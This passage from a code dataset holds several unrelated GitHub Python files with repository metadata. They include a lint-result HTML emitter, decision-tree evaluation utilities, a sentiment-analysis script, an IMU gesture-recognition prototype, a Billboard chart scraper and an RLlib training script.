,\r\n \r\n print(\"That is not single digit!!!\") #print a warning.\r\n \r\n n = int(input(\"please enter a single digit integer: \")) # ask the user to input a number until the condition of while statemnet is not true\r\n \r\n break\r\n\r\neven_numbers = [ i for i in range(n+1) if i % 2 == 0] # assign a list that the even numbers from 0 to n (including n)\r\n \r\nprint(even_numbers) #print out the list\r\n","repo_name":"akdenizz/GlobalAIHubPythonCourse","sub_path":"HW-Day2.py","file_name":"HW-Day2.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"7364948695","text":"\"\"\"lintswitch emitters: Parts which output the results of linting / checking.\n\"\"\"\n\nimport logging\nimport os.path\nimport datetime\n\nLOG = logging.getLogger(__name__)\n\n\ndef emit(filepath, errors, warnings, summaries):\n \"\"\"Generate HTML results. Main entry point to this module.\n \"\"\"\n\n log_emit(filepath, summaries=summaries)\n\n return html_emit(filepath,\n errors=errors,\n warnings=warnings,\n summaries=summaries)\n\n\ndef log_emit(filepath, summaries=None):\n \"\"\"Write summary to log file at DEBUG level\"\"\"\n filename = os.path.basename(filepath)\n body = []\n for name, summary in summaries.items():\n body.append(name + ': ' + summary)\n LOG.debug('%s: %s', filename, ', '.join(body))\n\n\n#--------\n# HTML formatted results\n#--------\n\nHTML_CONTENT = u\"\"\"
<div class=\"file\"><h1>FILENAME</h1><p>Last updated: TIME</p><hr/>CONTENT\"\"\"\n\n\ndef html_emit(filepath, errors=None, warnings=None, summaries=None):\n \"\"\" HTML snippet of results, for our web server to push out.\n \"\"\"\n content = []\n\n content.extend(_emit_errors(errors))\n content.extend(_emit_warnings_and_summaries(warnings, summaries))\n\n if not content:\n content = [u'All good']\n\n filename = os.path.basename(filepath)\n\n now = datetime.datetime.now()\n html = [u'<div class=\"file\"><h1>%s</h1><hr/>' % filename]\n html.append(u'<br/><p>%s</p>' % filepath)\n html.append(u'Last updated: %s<br/><hr/>' % now.strftime('%A %d %b, %H:%M'))\n html.extend(content)\n\n return ''.join(html)\n\n\ndef _emit_errors(errors):\n \"\"\"Error list as array of HTML strings\"\"\"\n if not errors:\n return []\n\n content = []\n content.append(u'<div class=\"errors\">')\n for name, err in errors.items():\n content.append(u'<h3>%s</h3>%s<br/>' % (name, '<br/>'.join(err)))\n content.append(u'</div>')\n return content\n\n\ndef _emit_warnings_and_summaries(warnings, summaries):\n \"\"\"Warnings and summaries as array of HTML strings\"\"\"\n if not warnings:\n return []\n\n content = []\n for name, warns in warnings.items():\n if not warns:\n continue\n content.append(u'<div class=\"warnings\">')\n\n content.append(u'<hr/><h3>%s</h3><br/>' % name)\n if name in summaries:\n content.append(u'<blockquote><p>%s</p></blockquote>' % summaries[name])\n\n content.append(u'<table>')\n for line in warns:\n content.append(_as_html_row(line))\n content.append(u'</table>')\n\n content.append(u'</div>')\n\n return content\n\n\ndef _as_html_row(line):\n \"\"\"Warning line as html row\"\"\"\n parts = line.split(': ')\n return u'<tr><td>{num}</td><td>{msg}</td></tr>'.format(\n num=parts[0], msg=parts[1])","repo_name":"grahamking/lintswitch","sub_path":"lintswitch/emitters.py","file_name":"emitters.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"20"}
+{"seq_id":"46677278422","text":"n, m = map(int, input().split())\n\na = []\npos = [[0] * n for _ in range(m)]\n\nfor i in range(m):\n tmp = [x - 1 for x in map(int, input().split())]\n # print(tmp)\n a.append(tmp)\n for j, x in enumerate(tmp): \n pos[i][x] = j\n# print(pos)\n\nprev = [-1] * m\n\nans = 0\ncnt = 0\nfor i in range(n):\n # print(prev)\n v = a[0][i]\n # print(v)\n if all(pos[j][v] == prev[j] + 1 or prev[j] == -1 for j in 
range(m)):\n cnt += 1\n else:\n cnt = 1\n ans += cnt\n prev = [pos[j][v] for j in range(m)]\n\nprint(ans)\n\n","repo_name":"jpswing/codes","sub_path":"1043D/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"6809267326","text":"import os\nimport pickle\nimport statistics\nimport pandas as pd\n\nimport contexts.FBDecisionTree as FBDtree\nfrom sklearn.metrics import f1_score\n\n\nclass TreeEvaluation:\n def __init__(self, tree_path):\n self.tree_path = os.path.abspath(tree_path)\n self.f_scores = dict()\n self.pandas_scores = dict()\n\n def add_evaluation(self, guess_path, dtree=None, verbose=False,\n equivalence_map=None, singletons_only=False, tree_label=None,\n compilation_label=None):\n with open(guess_path, 'rb') as f:\n guesses = pickle.load(f)\n\n if dtree is None:\n with open(self.tree_path, 'rb') as f:\n dtree = pickle.load(f)\n\n f_score = get_evaluation(dtree, guesses, equivalence_map=equivalence_map,\n singletons_only=singletons_only)\n if verbose:\n print(\"Latest F Score: {}\".format(f_score))\n\n if tree_label is not None and compilation_label is not None:\n if tree_label not in self.pandas_scores:\n self.pandas_scores[tree_label] = dict()\n\n if compilation_label not in self.pandas_scores[tree_label]:\n self.pandas_scores[tree_label][compilation_label] = list()\n\n self.pandas_scores[tree_label][compilation_label].append(f_score)\n\n\n self.f_scores[guess_path] = f_score\n if verbose:\n print(\"Average F Score: {}\".format(statistics.mean(self.f_scores)))\n\n def __str__(self):\n result = \"F Scores for {}\\n\".format(self.tree_path)\n for guess_path, f_score in self.f_scores.items():\n result += \"\\t{}: {}\\n\".format(guess_path, f_score)\n if len(self.f_scores):\n result += \"Average = {}\\n\".format(\n statistics.mean(self.f_scores.values()))\n\n return result\n\n def to_csv(self, destination):\n with open(destination, 'w') as f:\n if len(self.pandas_scores) > 0:\n averages = dict()\n for tree_label, compilation_levels in self.pandas_scores.items():\n if tree_label not in averages:\n averages[tree_label] = dict()\n for compilation_level, f_scores in compilation_levels.items():\n averages[tree_label][compilation_level] = \\\n statistics.mean(f_scores)\n df = pd.DataFrame(averages)\n df.to_csv(f)\n\n\ndef get_preds_and_truths(tree, guesses, equivalence_map=None, singletons_only=False):\n tree_funcs = list()\n for fd in tree.get_func_descs():\n tree_funcs.append(fd.name)\n\n preds = list()\n truths = list()\n unknown = \"@@UNKNOWN@@\"\n\n for fd, equiv_class in guesses.items():\n fd_name = fd.name\n if singletons_only and equiv_class is not None and len(equiv_class) > 1:\n continue\n if equivalence_map is not None and fd_name in equivalence_map:\n fd_name = equivalence_map[fd_name]\n\n if equiv_class is None:\n preds.append(unknown)\n else:\n found = False\n for ec in equiv_class:\n ec_name = ec.name\n if equivalence_map is not None and ec_name in equivalence_map:\n ec_name = equivalence_map[ec_name]\n\n if fd_name == ec_name:\n preds.append(ec_name)\n found = True\n break\n if not found:\n preds.append(ec_name)\n\n if fd_name in tree_funcs:\n truths.append(fd_name)\n else:\n truths.append(unknown)\n\n return preds, truths\n\n\ndef get_evaluation(tree, guesses, equivalence_map=None, singletons_only=False):\n preds, truths = get_preds_and_truths(tree=tree, guesses=guesses,\n equivalence_map=equivalence_map)\n return f1_score(truths, preds, 
average='micro')\n\n\ndef classify_guesses(tree, guesses, equivalence_map=None):\n func_names = set()\n true_pos = set()\n true_neg = set()\n labeled_known_when_unknown = set()\n labeled_unknown_when_known = set()\n labeled_incorrectly = set()\n\n for fd in tree.get_func_descs():\n func_names.add(fd.name)\n\n for func_desc, guess in guesses.items():\n if \"ifunc\" in func_desc.name:\n continue\n\n if guess is not None:\n found = False\n for ec in guess:\n if \"ifunc\" in ec.name:\n continue\n\n ec_name = ec.name\n func_desc_name = func_desc.name\n\n if equivalence_map is not None:\n if ec_name in equivalence_map:\n ec_name = equivalence_map[ec_name]\n if func_desc_name in equivalence_map:\n func_desc_name = equivalence_map[func_desc_name]\n\n if ec_name == func_desc_name:\n found = True\n break\n\n if found:\n true_pos.add(func_desc.name)\n else:\n path = get_tree_path(tree, func_desc.name)\n if len(path) > 0:\n labeled_incorrectly.add(func_desc.name)\n else:\n labeled_known_when_unknown.add(func_desc.name)\n else:\n if func_desc.name in func_names:\n labeled_unknown_when_known.add(func_desc.name)\n else:\n true_neg.add(func_desc.name)\n\n true_pos_list = list(true_pos)\n true_pos_list.sort()\n\n true_neg_list = list(true_neg)\n true_neg_list.sort()\n\n labeled_incorrectly_list = list(labeled_incorrectly)\n labeled_incorrectly_list.sort()\n\n labeled_known_when_unknown_list = list(labeled_known_when_unknown)\n labeled_known_when_unknown_list.sort()\n\n labeled_unknown_when_known_list = list(labeled_unknown_when_known)\n labeled_unknown_when_known_list.sort()\n\n return true_pos_list, true_neg_list, labeled_incorrectly_list, labeled_known_when_unknown_list, labeled_unknown_when_known_list\n\n\ndef get_tree_coverage(dtree, target_func_desc_name):\n tree_path = get_tree_path(dtree, target_func_desc_name)\n path_coverages = list()\n for node in tree_path:\n if isinstance(node, FBDtree.FBDecisionTreeInteriorNode):\n for (func_desc, coverage) in node.get_coverage().items():\n if func_desc.name == target_func_desc_name:\n path_coverages.append(coverage)\n return path_coverages\n\n\ndef get_individual_tree_coverage(dtree):\n coverages = dict()\n for func_desc in dtree.get_func_descs():\n coverages[func_desc] = get_tree_coverage(dtree, func_desc.name)\n return coverages\n\n\ndef get_full_tree_coverage(dtree):\n executed_instructions = set()\n reachable_instructions = set()\n instruction_mapping = dict()\n for func_desc in dtree.get_func_descs():\n for addr in func_desc.instructions:\n instruction_mapping[addr] = func_desc\n\n for node in dtree.get_all_interior_nodes():\n for func_desc, coverage_data in node.get_coverage().items():\n for addr in coverage_data:\n curr_func = instruction_mapping[addr]\n executed_instructions.add(addr)\n for inst in curr_func.instructions:\n reachable_instructions.add(inst)\n\n return len(executed_instructions) / len(reachable_instructions)\n\n\ndef get_tree_path(tree, func_name):\n path = list()\n path.append(tree.root)\n if _dfs_tree(func_name, path):\n return path\n path.pop()\n return path\n\n\ndef _dfs_tree(func_name, path):\n if path[-1].is_leaf():\n for ec in path[-1].get_equivalence_class():\n if ec.name == func_name:\n return True\n return False\n else:\n path.append(path[-1].get_left_child())\n if _dfs_tree(func_name, path):\n return True\n path.pop()\n path.append(path[-1].get_right_child())\n if _dfs_tree(func_name, path):\n return True\n path.pop()\n return False\n\n\ndef bin_ec_sizes(tree, max_ec_size=10):\n equiv_classes = tree.get_all_equiv_classes()\n 
bins = dict()\n for idx in range(1, max_ec_size + 1):\n bins[idx] = 0\n\n for ec in equiv_classes:\n ec_size = len(ec)\n if ec_size >= max_ec_size:\n bins[max_ec_size] += 1\n else:\n bins[ec_size] += 1\n\n return bins\n","repo_name":"HexHive/IOVFI","sub_path":"src/software-ethology/python/contexts/treeutils.py","file_name":"treeutils.py","file_ext":"py","file_size_in_byte":8471,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"20"} +{"seq_id":"22214192458","text":"# encoding:utf-8\nimport codecs, jieba\nimport pandas as pd\nimport re\n\nclass Analysis:\n def preteat_clause(self, phase, articlecompany):\n # 分句\n cut_list = list('。!~?!?…')\n reslist, i, start = [], 0, 0\n for word in phase:\n if word in cut_list:\n if phase[start:i] != '':\n reslist.append(phase[start:i]) # 如果这一段字符不为空,放入reslist中\n start = i + 1\n i += 1\n else:\n i += 1\n # 通过上述来控制去除cut_list内容,将划分好的语段放入reslist中\n if start < len(phase): # 说明一整段没有分隔符\n reslist.append(phase[start:])\n return [i for i in reslist if articlecompany in i] # 返回分割好的语段列表\n\n def cutwords_jieba(self, sentence, stopwords='dict/stopwords.txt'):\n l = list(jieba.cut(sentence)) # 对sentence切分之后的结果存到l中\n return l\n\n def deal_wrap(self, filedict):\n temp = []\n try:\n for x in open(filedict, 'r', encoding='utf8').readlines():\n temp.append(x.strip())\n except Exception:\n for x in open(filedict, 'r', encoding='gbk').readlines():\n temp.append(x.strip())\n return temp # 得到去除空格的字符串列表\n\n def deal_zw(self, filedict):\n temp = []\n with codecs.open(filedict, 'r+', encoding='utf8') as f:\n preline = '' # 存当前行的上一行\n for line in f:\n if not line.startswith('')\n\n with open(\"label.txt\", 'r') as f:\n lablelist = [i.replace(\"\\n\", \"\") for i in f.readlines()]\n for tempstr in a.deal_wrap('predata.txt'):\n print(i)\n if i <= 1400:\n i+=1\n continue\n sentence_pscore1, sentence_nscore1 = 0, 0\n pos = []\n neg = []\n for x in a.preteat_clause(tempstr, aclist[i]):\n # 传统方法\n c = a.cutwords_jieba(x, )\n posscore, negscore, poslist, neglist = a.sentiment(c)\n sentence_pscore1 += posscore\n sentence_nscore1 += negscore\n pos += poslist\n neg += neglist\n sentiment = sentence_pscore1 - sentence_nscore1\n s1 = 0 if sentiment > 0 else 2\n str1 = re.sub(pattern, \"\", content[i]).replace(' ', \"\").replace(\" \", \"\")\n for p in set(pos):\n str1 = str1.replace(p[0], f\"[{p[0]}]\")\n for n in set(neg):\n str1 = str1.replace(n[0], f\"{{{n[0]}}}\")\n if int(lablelist[i]) != s1:\n wrong += 1\n string += str(i) + f\":\\n{str1}\\n\" + str(sentlist[int(lablelist[i])]) + \" \" + str(sentiment) + \"\\n\"\n string += \"poslist: \" + str(pos) + \"\\n\" + \"neglist: \" + str(neg) + \"\\n\\n\"\n i += 1\n if i % 50 == 0:\n print(\"wrong:\", wrong, wrong / i)\n print(wrong, wrong / 1400)\n with open(\"debug4.txt\", \"w\") as f:\n f.write(string)\n\n'''\n400+\n256\n'''\n","repo_name":"simonZPF/ysk","sub_path":"yzk/any2.py","file_name":"any2.py","file_ext":"py","file_size_in_byte":6891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"11420026774","text":"import objc\nfrom Foundation import NSObject, NSTimer, NSRunLoop, NSDefaultRunLoopMode\nfrom AppKit import NSScreen, NSApplication, NSEvent, NSKeyDownMask\n\nclass TimerHandler(NSObject):\n def timer_callback_(self, timer):\n screens = NSScreen.screens()\n print(\"Screens:\", screens)\n\n timer_callback_ = objc.selector(timer_callback_, signature=b'v@:@')\n\ndef main():\n # Set up the timer to call the timer_callback function every 
second\n handler = TimerHandler.alloc().init()\n timer = NSTimer.scheduledTimerWithTimeInterval_target_selector_userInfo_repeats_(1.0, handler, handler.timer_callback_, None, True)\n\n # Add timer to the main run loop\n NSRunLoop.mainRunLoop().addTimer_forMode_(timer, NSDefaultRunLoopMode)\n\n # Set up an instance of NSApplication and activate it\n NSApp = NSApplication.sharedApplication()\n NSApp.setActivationPolicy_(0) # NSApplicationActivationPolicyRegular\n\n print(\"Press 'q' to stop the script\")\n\n # Add an event monitor to catch the key down event when 'q' is pressed\n def key_down_handler(event):\n if event.characters() == 'q':\n print(\"Exiting...\")\n NSApp.stop_(None)\n\n monitor = NSEvent.addLocalMonitorForEventsMatchingMask_handler_(NSKeyDownMask, key_down_handler)\n\n # Run the main event loop\n NSApp.run()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dlucian/ScreenTrail","sub_path":"runloop.py","file_name":"runloop.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"25426942936","text":"# Requires the PyMongo package.\r\n# https://api.mongodb.com/python/current\r\nimport json\r\nimport pymongo\r\n\r\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/?readPreference=primary&appname=MongoDB%20Compass&ssl=false')\r\nnumVotesThreshold = 10\r\n\r\ndb = myclient[\"mikedb\"]\r\nmymoviecol = db[\"movie2\"]\r\n\r\nmyresult = myclient['mikedb']['movie2'].aggregate([\r\n {\r\n '$match': {\r\n 'numVotes': {\r\n '$gt': numVotesThreshold\r\n }\r\n }\r\n }, {\r\n '$match': {\r\n 'type': 'movie'\r\n }\r\n }, {\r\n '$match': {\r\n 'startYear': {\r\n '$gt': 1800\r\n }\r\n }\r\n }, {\r\n '$match': {\r\n 'avgRating': {\r\n '$gte': 0.0\r\n }\r\n }\r\n }\r\n])\r\n\r\nminStartYear = 3000\r\nmaxStartYear = 1800\r\nminAvgRating = 10.0\r\nmaxAvgRating = 0.0\r\n\r\nfor x in myresult:\r\n #print(\"avgRating = \"+ str((x[\"avgRating\"]).to_decimal()))\r\n if(int(x[\"startYear\"]) < minStartYear):\r\n minStartYear = int(x[\"startYear\"])\r\n if(int(x[\"startYear\"]) > maxStartYear):\r\n maxStartYear = int(x[\"startYear\"])\r\n if(float(x[\"avgRating\"]) < minAvgRating):\r\n minAvgRating = float(x[\"avgRating\"])\r\n if(float(x[\"avgRating\"]) > maxAvgRating):\r\n maxAvgRating = float(x[\"avgRating\"])\r\n #print(\"trying to update \"+ str(x[\"_id\"]))\r\n #mymoviecol.find_one_and_update({\"_id\": x[\"_id\"]}, {\"$set\": {\"kmeansNorm\": [str(x[\"startYear\"]),str(x[\"avgRating\"])]}})\r\n\r\n\r\nprint(\"max avg rating = \"+str(maxAvgRating))\r\nprint(\"min avg rating = \"+str(minAvgRating))\r\nprint(\"max start Year = \"+str(maxStartYear))\r\nprint(\"min start Year = \"+str(minStartYear))\r\n\r\nmyresult = myclient['mikedb']['movie2'].aggregate([\r\n {\r\n '$match': {\r\n 'numVotes': {\r\n '$gt': numVotesThreshold\r\n }\r\n }\r\n }, {\r\n '$match': {\r\n 'type': 'movie'\r\n }\r\n }, {\r\n '$match': {\r\n 'startYear': {\r\n '$gt': 1800\r\n }\r\n }\r\n }, {\r\n '$match': {\r\n 'avgRating': {\r\n '$gte': 0.0\r\n }\r\n }\r\n }\r\n])\r\n\r\nfor x in myresult:\r\n currStartYear = int(x[\"startYear\"])\r\n scaledStartYear = ((currStartYear - minStartYear)*1.0)/(maxStartYear - minStartYear)\r\n currAvgRating = float(x[\"avgRating\"])\r\n scaledAvgRating = (currAvgRating - minAvgRating)/(maxAvgRating - minAvgRating)\r\n mymoviecol.find_one_and_update({\"_id\": x[\"_id\"]}, {\"$set\": {\"kmeansNorm\": [str(scaledStartYear),str(scaledAvgRating)]}})\r\n 
","repo_name":"ss3398/Python","sub_path":"pymongokmeans/a8q1.py","file_name":"a8q1.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"20335270679","text":"import csv\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\nimport re\nimport serial\nimport time\nfrom tqdm import tqdm\nimport torch\nimport sys, getopt\n\nfrom modules.dataset import *\nfrom modules.train import *\nfrom modules.utils import *\n\nDEVICE = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nNUM_SAMPLES = 400\nTHRESHOLD = 0.8\n\n\ndef get_label(img, model):\n data = torch.from_numpy(img).float().to(DEVICE)\n # add batch dimension\n data = data.unsqueeze(0)\n with torch.no_grad():\n prediction = model(data)\n # print prediction as float with 2 decimals\n# np.set_printoptions(formatter={'float': lambda x: \"{0:0.2f}\".format(x)})\n# np.set_printoptions(suppress=True)\n print('Raw Prediction: ', np.around(prediction,3))\n prediction = (prediction > THRESHOLD).float()\n print('After thresholding: ', prediction)\n\n if prediction.sum() == 0:\n print('\\t \\t No prediction')\n return np.array([99]) # no label\n\n prediction = prediction.argmax(dim=1)\n\n return prediction\n\n\ndef normalize_between_0_and_1(data):\n flat_data = data.flatten()\n\n mmin_data = np.min(flat_data)\n mmax_data = np.max(flat_data)\n\n data = data - mmin_data\n data = data / (mmax_data - mmin_data)\n\n return data\n\n# plot data in 2x3 subplots\ndef plot_data_lin(macc, linacc, mgyro, lingyro):\n fig, ax = plt.subplots(2, 2)\n ax[0, 0].plot(macc)\n ax[0, 1].plot(linacc)\n ax[1, 0].plot(mgyro)\n ax[1, 1].plot(lingyro)\n\n plt.show()\n\n# create a ring buffer class\nclass RingBuffer:\n def __init__(self, size_max):\n self.gyro = [[0, 0, 0]] * size_max\n self.acc = [[0, 0, 0]] * size_max\n self.size_max = size_max\n self.cur = 0\n\n def append(self, x):\n self.acc[self.cur] = x[0:3]\n self.gyro[self.cur] = x[3:6]\n self.cur = (self.cur + 1) % self.size_max\n\n def get(self):\n \"\"\"return the buffer in chronological order\"\"\"\n return (\n self.acc[self.cur :] + self.acc[: self.cur],\n self.gyro[self.cur :] + self.gyro[: self.cur],\n )\n\n# create a class to read the data from the serial port\nclass SerialData:\n def __init__(self, serial_port=\"/dev/ttyACM0\", serial_baud=115200):\n self.ser = serial.Serial(serial_port, serial_baud)\n self.buffer = RingBuffer(1000)\n\n def update(self):\n data = []\n buffer = []\n while len(buffer) < 6:\n buffer = self.ser.read(self.ser.inWaiting())\n\n recent_data = buffer.decode(\"utf-8\").splitlines()\n\n data = []\n for i in recent_data:\n data = [float(s) for s in re.findall(r\"-?\\d+\\.?\\d*\", i)]\n if len(data) == 6:\n self.buffer.append(data)\n# print(data)\n\n return len(recent_data)\n\n def get_buffer(self):\n return self.buffer.get()\n\n def get_last_n_samples(self, n):\n acc, gyro = self.buffer.get()\n acc = np.array(acc)\n gyro = np.array(gyro)\n\n return acc[-n:], gyro[-n:]\n\n\nclass CurrentEstimate:\n def __init__(self):\n self.gravity_vector = np.array([0.0,0.0,0.0])\n self.velocity = np.array([0, 0, 0])\n \n def estimate_gravity_vector(self, acc, new_samples):\n samples = np.min([100, new_samples])\n self.gravity_vector = np.mean(acc[-samples:], axis=0)\n# print(\"gravity vector: \", self.gravity_vector)\n\n def estimate_velocity(self, acc, new_samples):\n self.estimate_gravity_vector(acc, new_samples)\n dt = 1 / 200\n 
self.velocity = np.zeros(3)\n\n # I assume that the board is always parallel to the ground\n self.gravity_vector = np.array([0, 0, 980.0])\n self.velocity = np.sum(acc[-new_samples:], axis=0) * dt - self.gravity_vector * dt * new_samples\n\n\n def get_estimate(self):\n return self.position, self.velocity, self.orientation\n\n\n def isMoving(self):\n if np.linalg.norm(self.velocity) > 10.0: # 1.0 for normal velocity, 0.1 for average velocity\n print(\"norm: \", np.linalg.norm(self.velocity))\n return True\n else:\n return False\n\n\n\nif __name__ == \"__main__\":\n print(f'Using device: {DEVICE}')\n ser = SerialData()\n current_estimate = CurrentEstimate()\n\n img_size = math.ceil(math.sqrt(NUM_SAMPLES))\n\n labels_map = get_labels_map()\n reverse_labels_map = {v: k for k, v in labels_map.items()}\n\n num_classes = len(labels_map)\n model = get_model(num_classes, DEVICE)\n print(model)\n model.load_state_dict(torch.load('results/model.pth'))\n model.eval()\n\n\n print(\"Rdy? go!\")\n while True:\n time.sleep(0.05)\n new_samples = ser.update()\n# print(\"new samples: \", new_samples)\n acc, gyro = ser.get_last_n_samples(new_samples)\n\n current_estimate.estimate_velocity(acc, new_samples)\n# print(\"acc shape: \", np.shape(acc))\n if current_estimate.isMoving() == False:\n continue\n print('--------------------------------------')\n print(\"I am moving\")\n\n # measure execution time \n start_time = time.time()\n new_samples = 0\n while( new_samples < NUM_SAMPLES):\n new_samples += ser.update()\n# print(\"new samples: \", new_samples)\n# time.sleep(1)\n\n stop_time = time.time()\n print(\"time: \", stop_time - start_time)\n# print(\"show measurements\")\n\n acc, gyro = ser.get_last_n_samples(NUM_SAMPLES)\n# print(\"acc shape: \", np.shape(acc))\n# print(\"gyro shape: \", np.shape(gyro))\n\n nacc = normalize_between_0_and_1(acc)\n ngyro = normalize_between_0_and_1(gyro)\n\n# plot_data_lin(nacc, acc, ngyro, gyro)\n\n data = np.concatenate((nacc, ngyro), axis=1)\n data_img = data2image(data)\n label = get_label(data_img, model)\n if label[0] != 99:\n print('Predicted label: ', reverse_labels_map[label[0].item()])\n\n","repo_name":"daleonpz/stwin_AI_vowel_recognition","sub_path":"trainer/prototype.py","file_name":"prototype.py","file_ext":"py","file_size_in_byte":6038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"47735545942","text":"from bs4 import BeautifulSoup\nimport pandas, requests, lxml\nfrom spotify import create_playlist\n#https://www.billboard.com/charts/hot-100/2002-07-20\n\nwhile True:\n try:\n year=str(input('Enter the Year YYYY : '))\n URL = f\"https://www.billboard.com/charts/hot-100/{year}-{str(input('Enter the Month MM : '))}-{str(input('Enter the Day DD: '))}\"\n response = requests.get(url=URL)\n response.raise_for_status()\n webpage = response.text\n soup = BeautifulSoup(webpage, \"html.parser\")\n break\n except :\n print(\"Invalid Date please enter it in the right format YYYY-MM-DD\")\n\n\n\n\n# print(soup.prettify())\nsongs=soup.find_all(name=\"span\",class_=\"chart-element__information__song text--truncate color--primary\")#soup.select(selector=\"button span span\")\nplaylist=[]\nyears=[]\nfor song in songs:\n playlist.append(song.string)\n years.append(year)\n\nsong_dict={\"Songs\":playlist,\n \"Year\":years\n\n }\ndata=pandas.DataFrame(song_dict)\ndata.to_csv(f\"Top-100-songs-in-{year}.csv 
\")\ncreate_playlist(playlist,year)\n","repo_name":"omar-sherif9992/Pythonist","sub_path":"Projects/Soup_apps/spotify_playlist/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"16799254829","text":"import numpy as np\nimport corner\nimport matplotlib.pyplot as plt\n\ndirs = ['../Torch/outputbasic',\n'../Torch/outputbasicLineNo',\n'../Torch/outputbasicLineNoP',\n'../Torch/outputbasicP',\n'../Torch/outputbi',\n'../Torch/outputbiLineNo',\n'../Torch/outputbiLineNoP',\n'../Torch/outputbiP',]\n\nfiles = ['ag.summary','ug.summary']\n\n\n#allData = np.array()\nmetrics = ['emptyPercentage', 'negativeSpace', 'decorationPercentage', 'pathPercentage', 'leniency', 'linearity', 'jumps', 'meaningfulJumps']\nprettyNames = {'emptyPercentage':r\"$e$\", 'negativeSpace':'$n$', 'decorationPercentage':'$d$', 'pathPercentage':'$p$', 'leniency':'$l$', 'linearity':'$R^2$', 'jumps':'$j$', 'meaningfulJumps':'$j_i$', 'length':'$s$'}\n\ndef formatData(file):\n my_data = np.genfromtxt(file, delimiter=',')\n with open(file,'r') as openfile:\n line = openfile.readline().rstrip()\n items = line.split(',')\n metricToIndex = {items[ii]:ii for ii in range(len(items))}\n \n columns = [metricToIndex[metric] for metric in metrics]\n data = my_data[1:,columns]\n data =data[data[:,3] > -1,:]\n labels = [prettyNames[metric] for metric in metrics]\n\n return (data,labels)\noriginals,_ = formatData('originals.summary')\nallData = originals\nfile2dat = {}\nfor dir in dirs:\n combined = None\n for file in files:\n data,labels = formatData('{}/{}'.format(dir,file))\n if allData is None:\n allData = data\n else:\n allData = np.concatenate([allData,data])\n if combined is None:\n combined = data\n else:\n combined = np.concatenate([combined,data])\n \n #figure = corner.corner(data,labels=labels,quantiles=[0.16, 0.5, 0.84])\n #figure.savefig('{}{}.png'.format(dir,file))\n file2dat['{}{}'.format(dir,file)] = (data,labels)\n file2dat['{}'.format(dir)] = (combined,labels)\n \nrange = [[allData[:,ii].min(), allData[:,ii].max()] for ii in range(allData.shape[1])]\nfor file in file2dat:\n figure = corner.corner(file2dat[file][0],labels=labels,range=range)\n figure.savefig('{}.png'.format(file))\n plt.close()\nfigure = corner.corner(originals,labels=labels,range=range)\nfigure.savefig('originals.png'.format(file))\nplt.close()\n","repo_name":"adamsumm/SMBRNN","sub_path":"Test/makePlots.py","file_name":"makePlots.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"34144103048","text":"'''Training script for the regular flat FarmingEnv'''\n\nfrom collections import Counter\nimport argparse\nimport os\nfrom typing import Dict, Any, Union\nimport pprint\n\nimport numpy as np\nimport ray\nfrom ray import tune, air\nfrom ray.rllib.algorithms.appo import APPOConfig\nfrom ray.rllib.examples.models.action_mask_model import TorchActionMaskModel\nfrom ray.rllib.algorithms.callbacks import DefaultCallbacks\nfrom ray.rllib.evaluation import Episode\nfrom ray.rllib.evaluation.episode_v2 import EpisodeV2\nfrom ray.rllib.policy.sample_batch import SampleBatch\n\nimport gymnasium as gym\nfrom gymnasium import spaces\nfrom gymnasium.wrappers.time_limit import TimeLimit\nfrom gymnasium.wrappers.record_video import RecordVideo\nfrom gymnasium.wrappers.normalize import NormalizeReward\n\n# pylint: disable=unused-import\nfrom 
wheatbot.farming import FarmingEnv\nfrom torch_action_mask_recurrent import TorchLSTMActionMaskModel as LSTMModel, TorchAttnActionMaskModel as AttnModel\n\nclass ParametricDictFlattenWrapper(gym.ObservationWrapper):\n '''Wrapper class that handles environments with an observation space of\n \n ```\n Dict({\n 'action_mask': Box(...),\n 'observations': Dict(...)\n })\n ```\n '''\n def __init__(self, env: gym.Env):\n super().__init__(env)\n\n self.observation_space = spaces.Dict({\n 'action_mask': env.observation_space['action_mask'],\n 'observations': spaces.flatten_space(self.env.observation_space['observations'])\n })\n\n def observation(self, obs: Dict[str, Any]):\n # pprint.pprint(obs['observations'], width=1)\n new_obs = {\n 'action_mask': obs['action_mask'],\n 'observations': spaces.flatten(self.env.observation_space['observations'], obs['observations'])\n }\n return new_obs\n\nclass Metrics(DefaultCallbacks):\n def on_episode_step(self, *, worker, base_env, policies = None, episode: Union[Episode, EpisodeV2], env_index = None, **kwargs):\n info: Dict[str, Any] = episode._last_infos['agent0']\n for k, v in info.items():\n if k.startswith('pos_') or k.endswith('_pbrs') or k.endswith('_dist'):\n episode.user_data.setdefault(k, []).append(v)\n\n def on_episode_end(self, *, worker, base_env, policies, episode: EpisodeV2, env_index, **kwargs):\n info = episode._last_infos['agent0']\n episode.custom_metrics['wheat_collected'] = info['wheat_collected']\n episode.custom_metrics['wheat_harvested'] = info['wheat_harvested']\n\n for k in episode.user_data.keys():\n if k.startswith('pos_') or k.endswith('_pbrs') or k.endswith('_dist'):\n episode.custom_metrics[k] = np.mean(episode.user_data[k])\n\n def on_postprocess_trajectory(self, *,\n worker, episode: Episode, agent_id, policy_id, policies, \n 